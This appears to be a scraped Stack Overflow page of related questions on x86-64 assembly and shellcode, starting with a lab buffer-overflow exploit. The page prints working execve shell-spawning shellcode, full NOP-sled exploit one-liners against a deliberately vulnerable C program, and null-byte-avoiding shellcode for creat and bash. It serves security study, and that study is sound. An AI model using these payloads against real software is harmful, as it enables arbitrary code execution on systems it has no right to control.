Syscall inside shellcode won't run

Syscall inside shellcode won't run - c

Note: I've already asked this question in Stackoverflow in Portuguese Language: https://pt.stackoverflow.com/questions/76571/seguran%C3%A7a-syscall-dentro-de-shellcode-n%C3%A3o-executa. But it seems to be a really hard question, so this question is just a translation of the question in portuguese.
I'm studying Information Security and performing some experiments trying to exploit a classic case of buffer overflow.
I've succeeded in the creation of the shellcode, its injection inside the vulnerable program and in its execution. My problem is that a syscall to execve() to get a shell does not work.
In more details:
This is the code of the vulnerable program (compiled in a Ubuntu 15.04 x88-64, with the following gcc flags: "-fno-stack-protector -z execstack -g" and with the ASLR turned off):
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
int do_bof(char *exploit) {
char buf[128];
strcpy(buf, exploit);
return 1;
}
int main(int argc, char *argv[]) {
if(argc < 2) {
puts("Usage: bof <any>");
return 0;
}
do_bof(argv[1]);
puts("Failed to exploit.");
return 0;
}
This is a small assembly program that spawn a shell and then exits. Note that this code will work independently. This is: If I assemble, link and run this code alone, it will work.
global _start
section .text
_start:
jmp short push_shell
starter:
pop rdi
mov al, 59
xor rsi, rsi
xor rdx, rdx
xor rcx, rcx
syscall
xor al, al
mov BYTE [rdi], al
mov al, 60
syscall
push_shell:
call starter
shell:
db "/bin/sh"
This is the output of a objdump -d -M intel of the above program, where the shellcode were extracted from (note: the language of the output is portuguese):
spawn_shell.o: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000000000 <_start>:
0: eb 16 jmp 18 <push_shell>
0000000000000002 <starter>:
2: 5f pop rdi
3: b0 3b mov al,0x3b
5: 48 31 f6 xor rsi,rsi
8: 48 31 d2 xor rdx,rdx
b: 48 31 c9 xor rcx,rcx
e: 0f 05 syscall
10: 30 c0 xor al,al
12: 88 07 mov BYTE PTR [rdi],al
14: b0 3c mov al,0x3c
16: 0f 05 syscall
0000000000000018 <push_shell>:
18: e8 e5 ff ff ff call 2 <starter>
000000000000001d <shell>:
1d: 2f (bad)
1e: 62 (bad)
1f: 69 .byte 0x69
20: 6e outs dx,BYTE PTR ds:[rsi]
21: 2f (bad)
22: 73 68 jae 8c <shell+0x6f>
This command would be the payload, which inject the shellcode along with the needed nop sleed and the return address that will overwrite the original return address:
ruby -e 'print "\x90" * 103 + "\xeb\x13\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
So far, I've already debugged my program with the shellcode injected very carefully, paying attention to the RIP register seeing where the execution goes wrong. I've discovered that:
The return address is correctly overwritten and the execution jumps to my shellcode.
The execution goes alright until the "e:" line of my assembly program, where the syscall to execve() happens.
The syscall simply does not work, even with the register correctly set up to do a syscall. Strangely, after this line, the RAX and RCX register bits are all set up.
The result is that the execution goes to the non-conditional jump that pushes the address of the shell again and a infinity loop starts until the program crash in a SEGFAULT.
That's the main problem: The syscall won't work.
Some notes:
Some would say that my "/bin/sh" strings needs to be null terminated. Well, it does not seem to be necessary, nasm seems to put a null byte implicitly, and my assembly program works, as I stated.
Remember it's a 64 bit shellcode.
This shellcode works in the following code:
char shellcode[] = "\xeb\x0b\x5f\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main() {
void (*func)();
func = (void (*)()) shellcode;
(void)(func)();
}
What's wrong with my shellcode?
EDIT 1:
Thanks to the answer of Jester, the first problem was solved. Additionaly, I discovered that a shellcode has not the requirement of work alone. The new Assembly code for the shellcode is:
spawn_shell: formato do arquivo elf64-x86-64
Desmontagem da seção .text:
0000000000400080 <_start>:
400080: eb 1e jmp 4000a0 <push_shell>
0000000000400082 <starter>:
400082: 5f pop %rdi
400083: 48 31 c0 xor %rax,%rax
400086: 88 47 07 mov %al,0x7(%rdi)
400089: b0 3b mov $0x3b,%al
40008b: 48 31 f6 xor %rsi,%rsi
40008e: 48 31 d2 xor %rdx,%rdx
400091: 48 31 c9 xor %rcx,%rcx
400094: 0f 05 syscall
400096: 48 31 c0 xor %rax,%rax
400099: 48 31 ff xor %rdi,%rdi
40009c: b0 3c mov $0x3c,%al
40009e: 0f 05 syscall
00000000004000a0 <push_shell>:
4000a0: e8 dd ff ff ff callq 400082 <starter>
4000a5: 2f (bad)
4000a6: 62 (bad)
4000a7: 69 .byte 0x69
4000a8: 6e outsb %ds:(%rsi),(%dx)
4000a9: 2f (bad)
4000aa: 73 68 jae 400114 <push_shell+0x74>
If I assemble and link it, it will not work, but if a inject this in another program as a payload, it will! Why? Because if I run this program alone, it will try to terminate an already NULL terminated string "/bin/sh". The OS seems to do an initial setup even for assembly programs. But this is not true if I inject the shellcode, and more: The real reason of my syscall didn't have succeeded is that the "/bin/sh" string was not NULL terminated in runtime, but it worked as a standalone program because in this case, it was NULL terminated.
Therefore, you shellcode run alright as a standalone program is not a proof that it works.
The exploitation was successfull... At least in GDB. Now I have a new problem: The exploit works inside GDB, but doesn't outside it.
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\ x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 13952 está executando novo programa: /bin/dash
$ ls
bof bof2.c bof3_env bof3_new_shellcode.txt bof3_shellcode.txt get_shell shellcode_exit shellcode_hello.c shellcode_shell2
bof.c bof3 bof3_env.c bof3_non_dbg func_stack get_shell.c shellcode_exit.c shellcode_shell shellcode_shell2.c
bof2 bof3.c bof3_gdb_env bof3_run_env func_stack.c shellcode_bof.c shellcode_hello shellcode_shell.c
$ exit
[Inferior 1 (process 13952) exited normally]
(gdb)
And outside:
$ ./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
fish: Job 1, “./bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')” terminated by signal SIGSEGV (Address boundary error)
Immediately I searched about it and found this question: Buffer overflow works in gdb but not without it
Initially I thought it was just matter of unset two environment variables and discover a new return address, but unset two variables had not made the minimal difference:
$ gdb -q bof3
Lendo símbolos de bof3...concluído.
(gdb) unset env COLUMNS
(gdb) unset env LINES
(gdb) r (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
Starting program: /home/sidao/h4x0r/C-CPP-Projects/security/bof3 (ruby -e 'print "\x90" * 92 + "\xeb\x1e\x5f\x48\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x48\x31\xc9\x0f\x05\x48\x31\xc0\x48\x31\xff\xb0\x3c\x0f\x05\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x70\xd8\xff\xff\xff\x7f"')
process 14670 está executando novo programa: /bin/dash
$
So now, this is the second question: Why the exploit works inside GDB but does not outside it?

The problem is the mov al,0x3b. You forgot to zero the top bits, so if they are not zero already, you will not be performing an execve syscall but something else. Simple debugging should have pointed this out to you. The solution is trivial: just insert xor eax, eax before that. Furthermore, since you append the return address to your exploit, the string will no longer be zero terminated. It's also easy to fix, by storing a zero there at runtime using for example mov [rdi + 7], al just after you have cleared eax.
The full exploit could look like:
ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc0\x88\x47\x07\xb0\x3b\x48\x31\xf6\x48\x31\xd2\x0f\x05\x30\xc0\x88\x07\xb0\x3c\x0f\x05\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\xd0\xd8\xff\xff\xff\x7f"'
The initial part corresponds to:
jmp short push_shell
starter:
pop rdi
xor eax, eax
mov [rdi + 7], al
mov al, 59
Note that due to the code size change, the offset for the jmp and the call at the end had to be changed as well, and the number of nop instructions too.
The above code (with the return address adjusted for my system) works fine here.

Related

Change on rax register during debug session with gdb does not affect code execution

I'm planning to participate to some of the Capture the flags (CTF) challenges, in the near future. For that reason, I've decided to study assembly. As of now I'm focusing on the usage of the CPU registers. Following some examples that I have found on internet, I tried to debug a very simple "Hello World" program written in C, to see how the CPU registers are used. My environment is Linux and GCC version 11. I compiled my code with the -g flag, in order to include debug symbols.
Following is my very simple C source code:
#include <iostream>
int main (int argc, char** argv)
{
char message_c_str[] = "Hello World from C!";
printf("%s\n", message_c_str);
return 0;
}
Studying the disassembly of the main function, I understand that the string containing the message gets stored inside the RAX (and RDX registers?), before calling the printf function:
└─$ objdump -M intel -D main| grep -A20 main.:
0000000000001159 <main>:
1159: 55 push rbp
115a: 48 89 e5 mov rbp,rsp
115d: 48 83 ec 30 sub rsp,0x30
1161: 89 7d dc mov DWORD PTR [rbp-0x24],edi
1164: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi
1168: 48 b8 48 65 6c 6c 6f movabs rax,0x6f57206f6c6c6548
116f: 20 57 6f
1172: 48 ba 72 6c 64 20 66 movabs rdx,0x6d6f726620646c72
1179: 72 6f 6d
117c: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax
1180: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx
1184: c7 45 f0 20 43 21 00 mov DWORD PTR [rbp-0x10],0x214320
118b: 48 8d 45 e0 lea rax,[rbp-0x20]
118f: 48 89 c7 mov rdi,rax
1192: e8 b9 fe ff ff call 1050 <puts#plt>
1197: b8 00 00 00 00 mov eax,0x0
119c: c9 leave
119d: c3 ret
I thought to start a debug session and try to change the RAX on the fly, just for the sake of seeing if I was able to change the string content before printing it on the command line. Unfortunately, even though it seems that I can change the RAX value, the program still prints the hard coded message. So, I'm not sure why I cannot change it. Am I missing to run any gdb command after updating the value of RAX?
Following is my debug session with the issue:
┌──(alexis㉿kali)-[~/Desktop/Hacking/hello_world]
└─$ gdb -q main
Reading symbols from main...
(gdb) break main
Breakpoint 1 at 0x1168: file /home/alexis/Desktop/Hacking/hello_world/main.cpp, line 5.
(gdb) run
Starting program: /home/alexis/Desktop/Hacking/hello_world/main
Breakpoint 1, main (argc=1, argv=0x7fffffffdf58) at
/home/alexis/Desktop/Hacking/hello_world/main.cpp:5
5 char message_c_str[] = "Hello World from C!";
(gdb) info register rax
rax 0x555555555159 93824992235865
(gdb) next
6 printf("%s\n", message_c_str);
(gdb) info register rax
rax 0x6f57206f6c6c6548 8022916924116329800
(gdb) set $rax=0x6361636361
(gdb) info register rax
rax 0x6361636361 426835665761
(gdb) next
Hello World from C!
8 return 0;
(gdb)
You can see that the code still prints "Hello World from C!", even if the RAX register changed. Why?

The string is only temporarily in rax+rdx. In the following lines it is placed on the stack and the address goes to rdi, that is used by puts.
What's important here is to understand that one line of source code is translated to multiple lines of assembly. When you change the rax on line printf("%s\n", message_c_str); the string is already pushed on the stack and rax only keeps an old value as it wasn't overwritten by anything. It is no longer the string that's being printed.
To accomplish your goal you would have to change the string on the stack or change it in rax before it's being pushed onto it (so before your next command).
Also be aware that next advances one source code line. If you want to move one assembly instruction use nexti - with that you have more control about what gets executed.

You're using next (whole block of asm corresponding to a C source line), not nexti or stepi (aka ni or si) to step by asm instruction.
And you made a debug build so GCC doesn't keep anything in registers across C statements. The points where execution stops with next are the ones where the compiler-generated instructions are about to load or LEA a new RAX, so its current value is dead and doesn't matter.
(And it's only using RAX at all because it's a debug build with GCC; otherwise things like lea rax,[rbp-0x20] / mov rdi,rax would LEA straight into RDI, instead of uselessly using RAX as a temporary. Return value from writing an unused parameter when falling off the end of a non-void function Or for mov-immediate to memory, there's no mov r/m64, imm64, only to register, so those moves to RAX and RDX do make sense.)
If you wanted to have it print something different, you could si until after movabs rax,0x6f57206f6c6c6548 but before mov QWORD PTR [rbp-0x20],rax, and at that point change the initializer for part of the string data. (Which is in RAX at that point.) e.g. introducing a 0x00 byte will terminate the C string.
Or right before the call puts, you could set $rdi = $rdi+5 to be like puts(message_c_str + 5).
layout reg or layout asm (use layout next / prev to fix the display if its broken) are helpful for seeing where execution is. See other GDB asm tips at the bottom of https://stackoverflow.com/tags/x86/info

How to convert an assembler program to shellcode correctly?

I programmed a program in nasm (x64) which should execute /bin/bash, and that works fine. Then i ran the program with objdump -D and i wrote down the machine code like this: \xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05. Then i ran this with ./shell $(python -c 'print "\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"') and i got an illegal instruction. But the assembler program worked fine! Can someone help?
shell.c:
int main(int argc, char **argv) {
int (*func)();
func = (int (*)()) argv[1];
(int)(*func)();
}
bash.asm:
section .text
global start
start:
mov rbx, 0x68
push rbx
mov rbx, 0x7361622f6e69622f
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 59
syscall
objdump:
./bash: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <start>:
401000: bb 68 00 00 00 mov $0x68,%ebx
401005: 53 push %rbx
401006: 48 bb 2f 62 69 6e 2f movabs $0x7361622f6e69622f,%rbx
40100d: 62 61 73
401010: 53 push %rbx
401011: 48 89 e7 mov %rsp,%rdi
401014: 50 push %rax
401015: 57 push %rdi
401016: 48 89 e6 mov %rsp,%rsi
401019: b0 3b mov $0x3b,%al
40101b: 0f 05 syscall

You are omitting the zero bytes here:
\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
as opposed to
401000: bb 68 00 00 00 mov $0x68,%ebx
The zero bytes are part of the instructions and cannot be skipped. So you have to include them.
The problem is, however, that the zero bytes would terminate the argument string and hence have to be avoided. It is your duty as shellcode designer to construct it in a way, that it does not include byte values that may not occur. In many cases this means no zero bytes, because the shellcode is injected as a C string, but other values may be problematic in other situations, too.

How does this program know the exact location where this string is stored?

I have disassembled a C program with Radare2. Inside this program there are many calls to scanf like the following:
0x000011fe 488d4594 lea rax, [var_6ch]
0x00001202 4889c6 mov rsi, rax
0x00001205 488d3df35603. lea rdi, [0x000368ff] ; "%d" ; const char *format
0x0000120c b800000000 mov eax, 0
0x00001211 e86afeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)
0x00001216 8b4594 mov eax, dword [var_6ch]
0x00001219 83f801 cmp eax, 1 ; rsi ; "ELF\x02\x01\x01"
0x0000121c 740a je 0x1228
Here scanf has the address of the string "%d" passed to it from the line lea rdi, [0x000368ff]. I'm assuming 0x000368ff is the location of "%d" in the exectable file because if I restart Radare2 in debugging mode (r2 -d ./exec) then lea rdi, [0x000368ff] is replaced by lea rdi, [someMemoryAddress].
If lea rdi, [0x000368ff] is whats hard coded in the file then how does the instruction change to the actual memory address when run?

Radare is tricking you, what you see is not the real instruction, it has been simplified for you.
The real instruction is:
0x00001205 488d3df3560300 lea rdi, qword [rip + 0x356f3]
0x0000120c b800000000 mov eax, 0
This is a typical position independent lea. The string to use is stored in your binary at the offset 0x000368ff, but since the executable is position independent, the real address needs to be calculated at runtime. Since the next instruction is at offset 0x0000120c, you know that, no matter where the binary is loaded in memory, the address you want will be rip + (0x000368ff - 0x0000120c) = rip + 0x356f3, which is what you see above.
When doing static analysis, since Radare does not know the base address of the binary in memory, it simply calculates 0x0000120c + 0x356f3 = 0x000368ff. This makes reverse engineering easier, but can be confusing since the real instruction is different.
As an example, the following program:
int main(void) {
puts("Hello world!");
}
When compiled produces:
6b4: 48 8d 3d 99 00 00 00 lea rdi,[rip+0x99]
6bb: e8 a0 fe ff ff call 560 <puts#plt>
So rip + 0x99 = 0x6bb + 0x99 = 0x754, and if we take a look at offset 0x754 in the binary with hd:
$ hd -s 0x754 -n 16 a.out
00000754 48 65 6c 6c 6f 20 77 6f 72 6c 64 21 00 00 00 00 |Hello world!....|
00000764

The full instruction is
48 8d 3d f3 56 03 00
This instruction is literally
lea rdi, [rip + 0x000356f3]
with a rip relative addressing mode. The instruction pointer rip has the value 0x0000120c when the instruction is executed, thus rdi receives the desired value 0x000368ff.
If this is not the real address, it is possible that your program is a position-independent executable (PIE) which is subject to relocation. Since the address is encoded using a rip-relative addressing mode, no relocation is needed and the address is correct, regardless of where the binary is loaded.

Shellcode Segmentation Fault error when run from exploitable program

BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rbx
xor al,al
xor cx,cx
mov al,8
mov cx,0755
int 0x80
xor al,al
inc al
xor bl,bl
int 0x80
two:
call one
db 'H'`
This is my assembly code.
Then I used two commands. "nasm -f elf64 newdir.s -o newdir.o" and "ld newdir.o -o newdir".I run ./newdir and worked fine but when I extracted op code and tried to test this shellcode using following c program . It is not working(no segmentation fault).I have compiled using cmd gcc newdir -z execstack
#include <stdio.h>
char sh[]="\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
objdump -d newdir
newdir: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: eb 16 jmp 400098 <two>
0000000000400082 <one>:
400082: 5b pop %rbx
400083: 30 c0 xor %al,%al
400085: 66 31 c9 xor %cx,%cx
400088: b0 08 mov $0x8,%al
40008a: 66 b9 f3 02 mov $0x2f3,%cx
40008e: cd 80 int $0x80
400090: 30 c0 xor %al,%al
400092: fe c0 inc %al
400094: 30 db xor %bl,%bl
400096: cd 80 int $0x80
0000000000400098 <two>:
400098: e8 e5 ff ff ff callq 400082 <one>
40009d: 48 rex.W
when I run ./a.out , I am getting something like in photo. I am attaching photo because I cant explain what is happening.image
P.S- My problem is resolved. But I wanted to know where things was going wrong. So I used debugger and the result is below
`
(gdb) list
1 char shellcode[] = "\xeb\x16\x5b\x30\xc0\x66\x31\xc9\xb0\x08\x66\xb9\xf3\x02\xcd\x80\x30\xc0\xfe\xc0\x30\xdb\xcd\x80\xe8\xe5\xff\xff\xff\x48";
2 int main (int argc, char **argv)
3 {
4 int (*ret)();
5 ret = (int(*)())shellcode;
6
7 (int)(*ret)();
8 } (gdb) disassemble main
Dump of assembler code for function main:
0x00000000000005fa <+0>: push %rbp
0x00000000000005fb <+1>: mov %rsp,%rbp
0x00000000000005fe <+4>: sub $0x20,%rsp
0x0000000000000602 <+8>: mov %edi,-0x14(%rbp)
0x0000000000000605 <+11>: mov %rsi,-0x20(%rbp)
0x0000000000000609 <+15>: lea 0x200a20(%rip),%rax # 0x201030 <shellcode>
0x0000000000000610 <+22>: mov %rax,-0x8(%rbp)
0x0000000000000614 <+26>: mov -0x8(%rbp),%rdx
0x0000000000000618 <+30>: mov $0x0,%eax
0x000000000000061d <+35>: callq *%rdx
0x000000000000061f <+37>: mov $0x0,%eax
0x0000000000000624 <+42>: leaveq
0x0000000000000625 <+43>: retq
End of assembler dump.
(gdb) b 7
Breakpoint 1 at 0x614: file test.c, line 7.
(gdb) run
Starting program: /root/Desktop/Progs/shell/a.out
Breakpoint 1, main (argc=1, argv=0x7fffffffe2b8) at test.c:7
7 (int)(*ret)();
(gdb) info registers rip
rip 0x555555554614 0x555555554614 <main+26>
(gdb) x/5i $rip
=> 0x555555554614 <main+26>: mov -0x8(%rbp),%rdx
0x555555554618 <main+30>: mov $0x0,%eax
0x55555555461d <main+35>: callq *%rdx
0x55555555461f <main+37>: mov $0x0,%eax
0x555555554624 <main+42>: leaveq
(gdb) s
(Control got stuck here, so i pressed ctrl+c)
^C
Program received signal SIGINT, Interrupt.
0x0000555555755048 in shellcode ()
(gdb) x/5i 0x0000555555755048
=> 0x555555755048 <shellcode+24>: callq 0x555555755032 <shellcode+2>
0x55555575504d <shellcode+29>: rex.W add %al,(%rax)
0x555555755050: add %al,(%rax)
0x555555755052: add %al,(%rax)
0x555555755054: add %al,(%rax)
Here is the debugging information. I am not able to find where the control goes wrong.If need more info please ask.

Below is a working example using x86-64; which could be further optimized for size. That last 0x00 null is ok for the purpose of executing the shellcode.
assemble & link:
$ nasm -felf64 -g -F dwarf pushpam_001.s -o pushpam_001.o && ld pushpam_001.o -o pushpam_001
Code:
BITS 64
section .text
global _start
_start:
jmp short two
one:
pop rdi ; pathname
xor rax, rax
add al, 85 ; creat syscall 64-bit Linux
xor rsi, rsi
add si, 0755 ; mode - octal
syscall
xor rax, rax
add ax, 60
xor rdi, rdi
syscall
two:
call one
db 'H',0
objdump:
pushpam_001: file format elf64-x86-64
0000000000400080 <_start>:
400080: eb 1c jmp 40009e <two>
0000000000400082 <one>:
400082: 5f pop rdi
400083: 48 31 c0 xor rax,rax
400086: 04 55 add al,0x55
400088: 48 31 f6 xor rsi,rsi
40008b: 66 81 c6 f3 02 add si,0x2f3
400090: 0f 05 syscall
400092: 48 31 c0 xor rax,rax
400095: 66 83 c0 3c add ax,0x3c
400099: 48 31 ff xor rdi,rdi
40009c: 0f 05 syscall
000000000040009e <two>:
40009e: e8 df ff ff ff 48 00
.....H.
encoding extraction: There are many other ways to do this.
$ for i in `objdump -d pushpam_001 | grep "^ " | cut -f2`; do echo -n '\x'$i; done; echo
\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00\x.....H.
C shellcode.c - partial
...
unsigned char code[] = \
"\xeb\x1c\x5f\x48\x31\xc0\x04\x55\x48\x31\xf6\x66\x81\xc6\xf3\x02\x0f\x05\x48\x31\xc0\x66\x83\xc0\x3c\x48\x31\xff\x0f\x05\xe8\xdf\xff\xff\xff\x48\x00";
...
final:
./shellcode
--wxrw---t 1 david david 0 Jan 31 12:25 H

If int 0x80 in 64-bit code was the only problem, building your C test with gcc -fno-pie -no-pie would have worked, because then char sh[] would be in the low 32 bits of virtual address space, so system calls that truncate pointers to 32 bits would still work.
Run your program under strace to see what system calls it actually makes. (Except that strace decodes int 0x80 syscalls incorrectly in 64-bit code, decoding as if you'd used the 64-bit syscall ABI. The call numbers and arg registers are different.) But at least you can see the system-call return values (which will be -EFAULT for 32-bit creat with a truncated 64-bit pointer.)
You can also just gdb to single-step and check the system call return values. Having strace decode the system-call inputs is really nice, though, so I'd recommend porting your code to use the 64-bit ABI, and then it would just work.
Also, it would actually be able to exploit 64-bit processes where the buffer overflow is in memory at an address outside the low 32 bits. (e.g. like the stack). So yes, you should really stop using int 0x80 or stick to 32-bit code.
You're also depending on registers being zeroed before your code runs, like they are on process startup, but not when called from anywhere else.
xor al,al before mov al,8 is completely pointless, because xor-zeroing al doesn't clear upper bytes. Writing 32-bit registers clears the upper 32, but not writing 8 or 16 bit registers. And if it did, you wouldn't need the xor-zeroing before using mov which is also write-only.
If you want to set RAX=8 without any zero bytes in the machine code, you can
push 8 / pop rax (3 bytes)
xor eax,eax / mov al,8 (4 bytes)
Or given a zeroed rcx register, lea eax, [rcx+8] (3 bytes)
Setting CX to 0755 isn't so simple, because the constant doesn't fit in an imm8. Your 16-bit mov is a good choice (or would have been if you'd zeroed rcx first.
xor ecx,ecx
lea eax, [rcx+8] ; SYS_creat = 8 from unistd_32.h
mov cx, 0755 ; mode
int 0x80 ; invoke 32-bit ABI
xor ebx,ebx
lea eax, [rbx+1] ; SYS_exit = 1
int 0x80

Why does initializing a variable `i` to 0 and to a large size result in the same size of the program?

There is a problem which confuses me a lot.
int main(int argc, char *argv[])
{
int i = 12345678;
return 0;
}
int main(int argc, char *argv[])
{
int i = 0;
return 0;
}
The programs have the same bytes in total. Why?
And where the literal value indeed stored? Text segment or other place?

The programs have the same bytes in total.Why?
There are two possibilities:
The compiler is optimizing out the variable. It isn't used anywhere and therefore doesn't make sense.
If 1. doesn't apply, the program sizes are equal anyway. Why shouldn't they? 0 is just as large in size as 12345678. Two variables of type T occupy the same size in memory.
And where the literal value indeed stored?
On the stack. Local variables are commonly stored on the stack.

Consider your bedroom.if you filled it with stuff or you left it empty,does that change the area of your bedroom?
the size of int is sizeof(int).it does not matter what value you store in it.

Because your program is optimized. At compile time, the compiler found out that i was useless and removed it.
If optimization didn't occurs, another simple explanation is that an int is the same size of another int.

TL;DR
First question: They're the same size because the instructions output of your program are roughly the same (more on that below). Further, they're the same size because the size(number of bytes) of your ints never change.
Second question: i variable is stored in your local variables frame which is in the function stack. The actual value you set to i is in the instructions (hardcoded) in the text-segment.
GDB and Assembly
I know you're using Windows, but consider these codes and output on Linux. I used the exactly same sources you posted.
For the first one, with i = 12345678, the actual main function is these computer instructions:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>:movl $0xbc614e,-0x4(%rbp)
0x00000000004004ff <+18>:mov $0x0,%eax
0x0000000000400504 <+23>:pop %rbp
0x0000000000400505 <+24>:retq
End of assembler dump.
As for the other program, with i = 0, main is:
(gdb) disass main
Dump of assembler code for function main:
0x00000000004004ed <+0>: push %rbp
0x00000000004004ee <+1>: mov %rsp,%rbp
0x00000000004004f1 <+4>: mov %edi,-0x14(%rbp)
0x00000000004004f4 <+7>: mov %rsi,-0x20(%rbp)
0x00000000004004f8 <+11>:movl $0x0,-0x4(%rbp)
0x00000000004004ff <+18>:mov $0x0,%eax
0x0000000000400504 <+23>:pop %rbp
0x0000000000400505 <+24>:retq
End of assembler dump.
The only difference between both codes is the actual value being stored in your variable. Lets go in a step by step trough these lines bellow (my computer is x86_64, so if your architecture is different, instructions may differ).
OPCODES
And the actual instructions of main (using objdump):
00000000004004ed <main>:
4004ed: 55 push %rbp
4004ee: 48 89 e5 mov %rsp,%rbp
4004f1: 89 7d ec mov %edi,-0x14(%rbp)
4004f4: 48 89 75 e0 mov %rsi,-0x20(%rbp)
4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
4004ff: b8 00 00 00 00 mov $0x0,%eax
400504: 5d pop %rbp
400505: c3 retq
400506: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40050d: 00 00 00
To get the actual difference of bytes, using objdump -D prog1 > prog1_dump and objdump -D prog2 > prog2_dump and them diff prog1_dump prog2_dump:
2c2
< draft1: file format elf64-x86-64
---
> draft2: file format elf64-x86-64
51,58c51,58
< 400283: 00 bc f6 06 64 9f ba add %bh,-0x45609bfa(%rsi,%rsi,8)
< 40028a: 01 3b add %edi,(%rbx)
< 40028c: 14 d1 adc $0xd1,%al
< 40028e: 12 cf adc %bh,%cl
< 400290: cd 2e int $0x2e
< 400292: 11 77 5d adc %esi,0x5d(%rdi)
< 400295: 79 fe jns 400295 <_init-0x113>
< 400297: 3b .byte 0x3b
---
> 400283: 00 e8 add %ch,%al
> 400285: f1 icebp
> 400286: 6e outsb %ds:(%rsi),(%dx)
> 400287: 8a f8 mov %al,%bh
> 400289: a8 05 test $0x5,%al
> 40028b: ab stos %eax,%es:(%rdi)
> 40028c: 48 2d 3f e9 e2 b2 sub $0xffffffffb2e2e93f,%rax
> 400292: f7 06 53 df ba af testl $0xafbadf53,(%rsi)
287c287
< 4004f8: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
---
> 4004f8: c7 45 fc 4e 61 bc 00 movl $0xbc614e,-0x4(%rbp)
Note on address 0x4004f8 your number is there, 4e 61 bc 00 on prog2 and 00 00 00 00 on prog1, both 4 bytes which is equal to sizeof(int). The bytes c7 45 fc are the rest of the instructions (move some value into an offset of rbp). Also note that the first two sections that differ have the same size in bytes (21). So, there you go, although slightly different, they're the same size.
Step by step through Assembly Instructions
push %rbp; mov %rsp, %rbp: This is called setting up the Stack Frame, and is standard for all C functions (unless you tell gcc -fomit-frame-pointer). This enables you to access the stack and your local variables through a fixed register, in this case, rbp.
